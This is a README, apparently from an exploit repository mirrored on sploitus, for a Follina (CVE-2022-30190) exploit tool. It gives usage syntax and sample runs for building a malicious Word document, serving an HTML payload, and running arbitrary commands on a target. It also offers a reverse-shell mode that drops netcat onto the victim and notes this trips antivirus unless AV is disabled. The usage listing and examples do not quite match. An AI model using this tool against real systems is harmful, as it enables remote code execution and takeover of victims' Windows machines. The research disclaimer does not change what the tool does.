## https://sploitus.com/exploit?id=6E70CDA8-57F7-5737-80B5-84D8D2254D9D
# FOLLINA-CVE-2022-30190
Implementation of FOLLINA-CVE-2022-30190
---
This repository contains an exploitation tool for the vulnerability `FOLLINA-CVE-2022-30190`
### **Disclaimer**
This tool developed for security testing and research purposes.
by cloning / forking this tool the origin developer withdraw any responsibilities on the actors actions.
---
### **Prerequisites**
1. read about the CVE-2022-30190 from <a href="https://ethical.blue/textz/n/32">here</a>
2. prepare your testing environment (I suggest using Virtual Box + Vagrant)
- Download VirtualBox from <a href="https://www.virtualbox.org/wiki/Downloads">here</a>
- Download Vagrant form <a href="https://www.vagrantup.com/Downloads">here</a>
- Read about Vagrant CLI from <a href="https://developer.hashicorp.com/vagrant/docs/cli">here</a>
---
Create a "Follina" MS-MSDT attack with a malicious Microsoft Word document and stage a payload with an HTTP server.
<img src="#">
### **Usage**
```textmate
usage: exploit.py [-h] [--command COMMAND] [--output OUTPUT] [--interface INTERFACE] [--port PORT]
options:
-h, --help show this help message and exit
--command COMMAND
command to run on the target (default: calc)
--output OUTPUT
output maldoc file (default: ./follina.doc)
--interface INTERFACE
network interface or IP address to host the HTTP server (default: eth0)
--port PORT
port to serve the HTTP server (default: 8000)
```
---
### **Examples**
Pop `calc.exe`:
```textmate
$ python3 exploit.py
[+] copied staging doc /tmp/9mcvbrwo
[+] created maldoc ./cve202230190.doc
[+] serving html payload on :8000
```
Pop `cmd.exe`:
```textmate
$ python3 exploit.py --command "cmd"
```
Get a reverse shell on port 9001. Note, this downloads a netcat binary onto the victim and places it in `C:\Windows\Tasks`.
It does not clean up the binary. This will trigger antivirus detections unless AV is disabled.
```textmate
$ python3 exploit.py --reverse 9001
```
<img src="#">